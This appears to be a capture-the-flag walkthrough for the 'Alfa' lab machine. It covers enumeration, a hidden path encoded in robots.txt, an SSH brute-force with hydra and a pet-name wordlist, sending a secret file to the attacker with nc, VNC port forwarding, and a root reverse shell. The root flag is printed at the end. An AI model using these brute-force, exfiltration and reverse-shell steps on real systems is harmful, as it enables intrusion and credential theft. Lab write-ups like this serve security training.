In this walkthrough, we deep explore the robots.txt source code and find an encoded code. On decryption, it reveals a directory on the server that leads us to create a password list for the Thomas user. We then SSH into the machine using a brute-force attack. For privilege escalation, we notice that the VNC service is running on localhost. By using SSH port forwarding, we gain root access.
Nmap
Discovered open port 80/tcp on 10.0.2.100
Discovered open port 139/tcp on 10.0.2.100
Discovered open port 21/tcp on 10.0.2.100
Discovered open port 445/tcp on 10.0.2.100
Discovered open port 65111/tcp on 10.0.2.100
Enumeration
ftp 10.0.2.100
Connected to 10.0.2.100.
220 (vsFTPd 3.0.3)
Name (10.0.2.100:user): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 113 4096 Dec 17 2020 .
drwxr-xr-x 3 0 113 4096 Dec 17 2020 ..
drwxr-xr-x 2 0 0 4096 Dec 17 2020 thomas
226 Directory send OK.
ftp> pass
Passive mode on.
ftp> cd thomas
250 Directory successfully changed.
ftp> ls -al
227 Entering Passive Mode (10,0,2,100,142,211).
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Dec 17 2020 .
drwxr-xr-x 3 0 113 4096 Dec 17 2020 ..
-rw-r--r-- 1 0 0 104068 Dec 17 2020 milo.jpg
226 Directory send OK.
ftp> get milo.jpg
These are only directories present on server
dirsearch --url http://10.0.2.100/ --wordlist /usr/share/wordlists/dirb/big.txt
[06:56:47] Starting:
[06:56:52] 301 - 306B - /css -> http://10.0.2.100/css/
[06:56:54] 301 - 308B - /fonts -> http://10.0.2.100/fonts/
[06:56:55] 301 - 309B - /images -> http://10.0.2.100/images/
[06:56:56] 301 - 305B - /js -> http://10.0.2.100/js/
[06:57:01] 200 - 459B - /robots.txt
[06:57:02] 403 - 275B - /server-status
before , this i was Bruteforcing the everyService , but forgot check the complete robots.txt page till the end , this encoded found at bottom of page
curl 10.0.2.100/robots.txt
...
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>+++++++++++++++++.>>---.+++++++++++.------.-----.<<--.>>++++++++++++++++++.++.-----..-.+++.++
this reveled /alfa-support directory
so here thomas gave a hint about his password has his petname with 3 digits at end
from ftp we got a picture of a pet name milo
so lets make a wordlist a bruteforce the ssh
with open("wordlist.txt", "w") as file:
print("started writing on wordlist.txt")
for i in range(1000):
file.write(f"milo{i:03}\n")
print("wordlist created")
Exploitation
from genrated wordlist lets bruteforce the ssh
hydra -l thomas 10.0.2.100 -P wordlist.txt ssh -t 64 -I -s 65111
[65111][ssh] host: 10.0.2.100 login: thomas password: milo666
password found !
Privilage Escaltion
thomas@Alfa:~$ ls -al
total 40
drwxr-xr-x 4 thomas thomas 4096 Dec 20 2020 .
drwxr-xr-x 3 root root 4096 Dec 16 2020 ..
-rw------- 1 thomas thomas 4 Dec 20 2020 .bash_history
-rw-r--r-- 1 thomas thomas 220 Dec 16 2020 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 Dec 16 2020 .bashrc
drwx------ 3 thomas thomas 4096 Jul 19 09:03 .gnupg
drwxr-xr-x 3 thomas thomas 4096 Dec 16 2020 .local
-rw-r--r-- 1 thomas thomas 807 Dec 16 2020 .profile
-rwxrwxrwx 1 root root 16 Dec 17 2020 .remote_secret
-rw-r--r-- 1 thomas thomas 1332 Dec 20 2020 user.txt
from thamos home folder there is .remote_secret ! might be helpfull
Transfering this to machine
#alphamachine
nc -nv 10.0.2.93 5555 < thomas/remote_secret
(UNKNOWN) [10.0.2.93] 5555 (?) open
#Attackers machine
nvlp 5555 > key
listening on [any] 5555 ...
connect to [10.0.2.93] from (UNKNOWN) [10.0.2.100] 35176
tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN
at local host vnc server is running as a root
lets PortForword the port into local machine using ssh
ssh -L 5901:127.0.0.1:5901 thomas@10.0.2.100
lets verify the port
nmap -p5901 127.0.0.1 -sCV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-19 08:11 BST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0026s latency).
PORT STATE SERVICE VERSION
5901/tcp open vnc VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
|_ VNC Authentication (2)
yes its running in our local machine
so we need a pass key to connect to the vnc ,
remember we got a remote_secret so this is the same pass key for vnc auth!
lets connect to it
ssvncviewer -passwd key 127.0.0.1::5901
excellent we are sucessfully connected now we need to get the root shell , since the nc is installed in the machine , creating the reverse shell will give us as root shell
nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.0.2.93] from (UNKNOWN) [10.0.2.100] 44398
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")'
root@Alfa:~# id
id
uid=0(root) gid=0(root) grupos=0(root)
root@Alfa:~# ls
ls
root.txt vnc
root@Alfa:~# cat r
cat root.txt
root_flag==>> QFqy4EUHwtu9rrrVe2T27we5W
, ; , .-'"""'-. , ; ,
\\|/ .' '. \|//
\-;-/ () () \-;-/
// ; ; \\
//__; :. .; ;__\\
`-----\'.'-.....-'.'/-----'
'.'.-.-,_.'.'
'( (..-'
'-'